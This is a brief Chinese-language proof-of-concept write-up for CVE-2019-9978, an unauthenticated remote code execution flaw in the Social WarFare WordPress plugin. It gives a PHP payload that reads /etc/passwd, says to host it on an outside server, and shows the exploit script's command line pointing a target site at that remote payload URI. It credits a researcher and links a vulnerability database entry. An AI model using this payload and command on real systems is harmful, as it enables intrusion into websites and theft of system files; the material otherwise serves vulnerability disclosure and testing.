CVE-2019-9978 - (PoC) Social WarFare 插件中的RCE(版本<=3.5.2)
在设置导入功能中发现了未经身份验证的远程代码执行漏洞。攻击者可利用RFI实现RCE。
复制以下payload:
<pre>system('cat /etc/passwd')</pre>
将其保存为文件名 payload.txt 并上传到服务器。URI应类似于 http(s)://yoursite.com/payload.txt。最后,提供你的 --target 和 --payload-uri 选项:
$ python cve-2019-9978.py --target http://vulntarget.com \
--payload-uri http://yourpayloadsite.com/payload.txt

研究员:Luka Sikic
链接:https://wpvulndb.com/vulnerabilities/9259?fbclid=IwAR2xLSnanccqwZNqc2c7cIv447Lt80mHivtyNV5ZXGS0ZaScxIYcm1XxWXM
作者:@hash3liZer